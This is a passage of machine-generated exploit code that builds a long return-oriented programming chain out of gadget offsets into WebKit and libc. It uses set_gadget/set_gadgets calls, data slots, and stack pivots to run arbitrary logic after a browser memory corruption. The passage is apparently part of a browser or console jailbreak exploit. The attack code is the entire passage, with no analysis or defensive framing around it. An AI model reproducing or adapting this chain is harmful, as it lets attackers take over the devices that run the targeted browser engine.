set_gadget(webkit_base+3236123,); //pop r9 //L4096: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4097: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4098: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+230800, //L4100 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+230784, //L4099 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4099: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4100: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4101: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4102: db([4, 0]); // 0x4 set_gadget(libc_base+763368,); //pop rcx //L4103: db([4, 0]); // 0x4 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+231000, //L4105 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4105: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+231056, //L4106 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4106: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi 
ropchain+231192, //L4110 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+231176, //L4109 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4108: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4109: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4110: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+231328, //L4113 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+231360, //L4115 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+231312, //L4112 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4112: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4113: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4114: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4115: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+231472, //L4116+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+231464, //L4116 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4116: db([0, 0]); // 0x0 set_gadgets([ ropchain+231488, //L4116+24 ropchain+261088, //L4111 libc_base+764760, //pop rsi ropchain+231528, //L4117 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4117: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4119: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi 
ropchain+231648, //L4122 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+231632, //L4120 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4120: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4122: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+231824, //L4125 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+231840, //L4126 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+231792, //L4123 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+231808, //L4124 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4123: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4124: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4125: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4126: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+231936, //L4128 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+231920, //L4127 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4127: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4128: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4129: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax 
libc_base+759608 //pop rax ]); //L4130: db([10, 0]); // 0xa set_gadget(libc_base+763368,); //pop rcx //L4131: db([10, 0]); // 0xa set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+232136, //L4133 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4133: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+232192, //L4134 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4134: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+232328, //L4138 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+232312, //L4137 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4136: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4137: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4138: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+232448, //L4141 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+232416, //L4139 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4139: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4140: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4141: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx 
eax, al libc_base+764760, //pop rsi ropchain+232584, //L4143 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+232600, //L4144 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+232568, //L4142 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4142: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4143: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4144: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+232760, //L4149 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+232776, //L4150 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+232712, //L4146 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4146: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4147: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4148: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4149: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4150: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+232888, //L4151+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+232880, //L4151 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4151: db([0, 0]); // 0x0 set_gadgets([ ropchain+232904, //L4151+24 ropchain+233304, //L4145 libc_base+764760, //pop rsi ropchain+232944, //L4152 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, 
r8 libc_base+763368 //pop rcx ]); //L4152: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4154: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+233064, //L4157 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+233048, //L4155 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4155: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4157: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+233208, //L4160 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+233224, //L4161 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+233176, //L4158 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4158: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4159: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4160: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4161: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+233296, //L4162 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4162: db([0, 0]); // 0x0 //L4145: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+233424, //L4165 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+233440, //L4166 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+233408, //L4164 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4164: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4165: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4166: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+233600, //L4171 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+233616, //L4172 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+233552, //L4168 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4168: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4169: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4170: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4171: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4172: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+233728, //L4173+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+233720, //L4173 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4173: db([0, 0]); // 0x0 set_gadgets([ ropchain+233744, //L4173+24 ropchain+236960, //L4167 libc_base+764760, //pop rsi ropchain+233784, //L4174 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4174: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4176: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+233904, //L4179 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+233888, 
//L4177 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4177: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4179: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+234048, //L4182 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+234016, //L4180 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+234032, //L4181 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4180: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4181: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4182: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+234128, //L4183 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4183: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4185: db([80, 0]); // 0x50 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+234248, //L4188 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+234232, //L4186 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4186: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4188: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+234424, //L4191 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+234440, //L4192 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+234392, //L4189 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+234408, //L4190 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4189: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4190: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4191: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4192: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+234600, //L4196 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+234568, //L4194 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+234584, //L4195 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4193: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4194: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4195: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4196: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+234688, //L4197 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+234704, //L4198 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4197: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4198: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+234872, //L4200 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+234888, //L4201 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+234856, //L4199 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4199: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4200: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4201: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+235048, //L4206 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+235064, //L4207 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+235000, //L4203 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4203: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4204: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4205: db([1, 0]); // 0x1 set_gadget(webkit_base+3236123,); //pop r9 //L4206: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4207: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+235184, //L4208+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+235176, //L4208 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4208: db([0, 0]); // 0x0 set_gadgets([ ropchain+235200, //L4208+24 ropchain+236584, //L4202 libc_base+764760, //pop rsi ropchain+235240, //L4209 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx 
]); //L4209: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4211: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+235360, //L4214 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+235344, //L4212 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4212: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4214: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+235504, //L4217 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+235472, //L4215 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+235488, //L4216 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4215: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4216: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4217: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+235584, //L4218 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4218: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4220: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+235704, //L4223 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+235688, //L4221 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4221: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop 
rdi //L4223: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+235880, //L4226 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+235896, //L4227 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+235848, //L4224 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+235864, //L4225 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4224: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4225: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4226: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4227: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+236056, //L4231 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+236024, //L4229 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+236040, //L4230 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4228: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4229: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4230: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4231: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+236144, //L4232 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+236160, //L4233 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4232: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4233: db([0, 0]); 
// 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+236328, //L4235 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+236344, //L4236 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+236312, //L4234 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4234: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4235: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4236: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+236488, //L4239 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+236504, //L4240 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+236456, //L4237 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4237: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4238: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4239: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4240: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+236576, //L4241 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4241: db([0, 0]); // 0x0 //L4202: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+236704, //L4244 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+236720, //L4245 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+236688, //L4243 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4243: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4244: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4245: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+236864, //L4248 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+236880, //L4249 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+236832, //L4246 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4246: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4247: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4248: db([0, 0]); // 0x0 